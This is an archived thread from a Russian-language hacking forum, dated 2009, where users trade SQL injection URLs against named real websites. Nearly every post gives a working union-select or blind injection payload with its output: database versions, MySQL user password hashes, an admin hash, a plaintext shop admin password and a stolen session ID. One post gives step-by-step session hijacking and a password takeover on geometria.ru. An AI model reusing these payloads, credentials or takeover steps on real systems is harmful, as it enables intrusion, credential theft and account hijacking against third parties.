ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.04.2009, 18:00
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Код:
http://www.povituha.ru/news.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--+
db: 5.0.32-Debian_7etch3-log
name_db: povituha
user: povit_gst@localhost
-----------------------------
-----------------------------
Код:
http://oculus.ru/blog.php?id=106&a=-9+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7--+
db: 4.1.14-log
name_db: oculus
user: oculus@localhost
Последний раз редактировалось farex; 05.04.2009 в 18:48..
|
|
|
05.04.2009, 19:13
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),4,5,6,7,8/*
version():4.1.11-Debian_4sarge7-log
database():hcch
user():hcch@localhost
Код:
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5,6,7,8+from+mysql.user/*
root:066bc62049564980
debian-sys-maint:29fd31b70de75eef
loonsom:30acaa6013620a70
hcch:49486a7f003c5faa
mp3act:00e4b206540aea24
rwv:7afa5b201c1b6669
vtiger:7888cda30bcc3c16
vtiger_sport:2db1898a5bbad4ca
newwavei:5f5a29b54316b43f
stayokay:5a0f66d4277d854b
kees:6e15cff222b5b0dc
incadat:177de41f23fdd5ae
vaneijzeren:11105af933ee8348 |
|
|
|
05.04.2009, 19:27
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://www.virginworlds.com/pg.php?n=470099+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22--
Database Version: 5.0.67-0ubuntu6
Database name: virginworlds
User name: vwuser@localhost
|
|
|
|
05.04.2009, 19:48
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Код:
http://scriptorium.serve-it.nl/view.php?sid=54+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost |
|
|
|
05.04.2009, 20:28
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163
Репутация:
158
|
|
pr4
Код:
http://imperial.ca.gov/section.php?id=17+and+ascii(substring(y()),1,1))=x
y1=version
y2=user
x1=53,46,48,46,48,55
x2=114,105,98,97,114,100,111,104,100,122,64,108,111, 99,97,108,104,111,115,116
version() - 5.0.07
user() - ribardohdz@localhost |
|
|
|
05.04.2009, 22:19
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
worldstart.com
pr=5
Код:
http://worldstart.com/kb/answers.php?sku=3917+and+1=0+union+select+1,2,3,concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),5+--%20--
Код:
tipadmin@207.126.59.171 kb 5.0.45 /usr/ /var/lib/mysql/ /tmp/ redhat-linux-gnu
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
05.04.2009, 23:45
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
geometria.ru
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,database(),user(),version()),7/*
geometria:geometria@client131-18.cmk.ru:5.0.45-log
Идем в information_schema.
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,table_name,7+from+information_schema.tables/*
Интересная таблица "user"
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,column_name,7+from+information_schema.columns+wh ere+table_name=0x75736572/*
Мне понравились колонки: login,password =)
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,login,password),7+from+user+limit +1,500/*
Выводим первые 500 из базы.Всего на данные момент 176055 рабочих аакаунтов.
Пароль захеширован хз чем может md5 с солью,но колонку с ней не нашел,а нам и не нада.))
И так выбираем пользователя,например " Fusion".
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4, 5,concat_ws(0x3a,login,session_id),7+from+user+whe re+login=0x467573696F6E/*
Fusion:mfjrhju2pua8lj4ob7k3n20e81
Итакс,хорошо.Дальше если зареганы заходим в редактирование cookies.Меняем PHPSESSID,ок,F5 и вот мы под чужим логином. Жмем на наш логин попадаем на страницу с инфой пользователя,жмем на изменить данные.Фишка в том что при смене пароля не запрашивает старый пароль) поэтому 2 раза вводим новый пароль потом "изменить" и все.=)
|
|
|
|
06.04.2009, 01:55
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.uoit.ca/calendar/0405/info-display.php?ID=-83/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4..20-standard
Database name: uoitcalendar0405
User name: uoitcalendar0405@localhost
http://www.quantumbindery.ca/bindery-equipment/equipment-display.php?id=-10/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4.1.22-standard
Database name: quantum_products
User name: quantum_leap@localhost
Последний раз редактировалось Rubaka; 06.04.2009 в 02:16..
|
|
|
|
06.04.2009, 15:11
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Код:
http://ladyfitness.ru/php/photo.php3?id=999+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8--+
db: 5.0.51
name_db: ladyfit
user: db_user@localhost
os: portbld-freebsd6.2
table: users
db: pun_bb
-=admin=-
log: admin
pass: 36058a75bd500c96eeaca789e9f1fe1d758e7f66 
-=users=-
+limit+x,x--+ |
|
|
|
06.04.2009, 17:01
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
греческий шоп (pr = 3)
Код:
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5+--
user() = roses2u_roses@localhost
database() = roses2u_roses
version() = 5.0.67-community
Код:
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,username,password),5+from+users+--
username = roses2u
password = rc4#7!
пародия на админку: http://roses2u.gr/console/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1208960){kind=avatar}
Похожие темы
Линейный вид
